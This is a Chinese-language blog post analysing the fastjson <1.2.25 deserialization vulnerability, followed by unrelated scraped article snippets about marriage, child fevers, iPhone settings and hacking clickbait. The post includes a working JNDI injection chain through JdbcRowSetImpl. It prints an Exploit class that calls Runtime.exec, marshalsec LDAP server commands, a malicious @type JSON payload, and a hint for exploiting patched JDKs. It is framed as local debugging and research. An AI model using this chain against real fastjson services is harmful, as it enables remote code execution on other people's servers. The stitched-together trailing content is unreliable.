本文将对fastjson<1.2.25反序列漏洞进行漏洞原理分析、本地调试验证等,后续将以fastjson组件版本为时间轴,持续发布漏洞演变历程文章。
Fastjson<1.2.25
@type属性:Fastjson支持在json数据中使用@type属性,该json数据会被反序列化成指定的对象类型,在反序列化过程中fastjson会调用parse(jsonStr)函数尝试对对象的属性进行赋值,若对象的javabean存在属性的setter *** 则调用set *** ,反之调用get *** 。
import java.util.Map; public class User { private String name; private Map map; public String getName() { System.out.println("getName is running ..."); return name; } public void setName(String name) { System.out.println("setName is running ..."); this.name=name; } @Override public String toString() { return "User
经过代码追踪,发现属性赋值是在FieldDeserializer.java的setValue函数中,因为map属性不存在set *** ,故在setValue函数中fieldInfo.getOnly为true,method为getmap ***
public void setValue(Object object, Object value) { if (value==null // && fieldInfo.fieldClass.isPrimitive()) { return; } try { Method method=fieldInfo.method; if (method !=null) { if (fieldInfo.getOnly) {//set *** 不存在,根据类型调用get *** if (fieldInfo.fieldClass==AtomicInteger.class) { AtomicInteger atomic=(AtomicInteger) method.invoke(object); if (atomic !=null) { atomic.set(((AtomicInteger) value).get()); } } else if (fieldInfo.fieldClass==AtomicLong.class) { AtomicLong atomic=(AtomicLong) method.invoke(object); if (atomic !=null) { atomic.set(((AtomicLong) value).get()); } } else if (fieldInfo.fieldClass==AtomicBoolean.class) { AtomicBoolean atomic=(AtomicBoolean) method.invoke(object); if (atomic !=null) { atomic.set(((AtomicBoolean) value).get()); } } else if (Map.class.isAssignableFrom(method.getReturnType())) { Map map=(Map) method.invoke(object); if (map !=null) { map.putAll((Map) value); } } else { Collection collection=(Collection) method.invoke(object); if (collection !=null) { collection.addAll((Collection) value); } } } else {//set *** 存在,调用set *** method.invoke(object, value); } return; }
调试可以发现调用链如下:
(2)漏洞利用,经过上述分析,满足一下任意条件可进行RCE
找到一个类,存在一个属性,属性类型为AtomicInteger、AtomicLong、AtomicBoolean、Map或Collection其中一种类型,定义了属性的get *** 但未定义set *** ,在get *** 中可构造gadget链达到代码执行目的。
找到一个类,存在一个属性,定义了set *** ,在 *** 中可构造gadget链达到代码执行目的。
找到一个类JdbcRowSetImpl,在变量autoCommit的set函数中,会调用connect函数:
connect函数中,会获取private成员变量dataSourceName,作为lookup函数的参数进行服务获取,这时JNDI注入攻击走起:
步骤1:启动HTTP服务并放置构造函数具有RCE的攻击类,启动LDAP服务
import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFactory; import java.io.IOException; import java.rmi.Remote; import java.rmi.server.UnicastRemoteObject; import java.util.Hashtable; public class Exploit extends UnicastRemoteObject implements ObjectFactory, Remote { public Exploit() throws IOException { System.out.println("Exploit"); Runtime.getRuntime().exec("calc"); } public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception { System.out.println("getObjectInstance"); Runtime.getRuntime().exec("calc"); return null; } }
python -m SimpleHTTPServer 80 java -cp .\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit 7777
步骤2:触发json解析,实现计算器弹窗
String className="com.sun.rowset.JdbcRowSetImpl";
String dataSourceName="ldap://127.0.0.1:7777/any";
json="{"@type":"" + className + ""," + ""dataSourceName":"" + dataSourceName + ""," + ""autoCommit":true" + "}";
//JDK 8u191及以后,默认为false,以下为了调试手工改了配置
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
*** ON.parse(json);
针对高版本JDK,默认配置限制了远程factory类的下载,实际环境中可以用LDAP+本地反序列化的方式去进行利用。
本文作者:CTCS安全攻防团队? pom
远嫁对于很多父母来说是反对的,特别是独生子女,意味着婚后想再见一次父母变得非常的困难,也有很多结婚后悔远嫁的,那么独生女该不该远嫁?下面友谊长存小编带来介绍。 独生女该不该远嫁? 俗话说易得无价宝...
. 幼儿发烧是比较常见的情况,导致孩子发烧的原因也有很多,不过有的父母会遇到宝宝晚上发烧的情况,那么宝宝半夜高烧家长应该如何护理呢?发烧腹泻宝宝吃什么好。 小孩子半夜发烧怎么办 首先要明确宝宝体...
1、最先向左边滚动显示屏。2、进到到app资料库页面。3、寻找必须修复的app并长按。3、点一下添加到主屏幕就可以修复。 知名品牌型号规格:iPhone12 系统软件:IOS14.3 如何...
本文导读目录: 1、终于明白黑客为什么不敢入侵支付宝了 2、支付宝真的安全吗?顶级黑客现场破解 3、黑客为什么不敢黑支付宝? 4、最强大脑支付宝攻防是哪一期? 5、支付宝如何与黑客硬刚...
春节刚刚过去,可能很多美女面对着即将到来的春天开始不知所措,因为春节在吃吃喝喝期间,身体上不知道不觉长了很多的赘肉,如果你是这样的女孩子,那么,我想我的文章真的会给你一些帮助了。因为我毫不夸张的说,我...
本文目录一览: 1、黑客能控制你麦克风听到你的声音吗? 2、黑客如何做到用摄像机麦克风录音 3、黑客如何超越麦克风,窃听你的一举一动! 黑客能控制你麦克风听到你的声音吗? 就现在的技术是可以...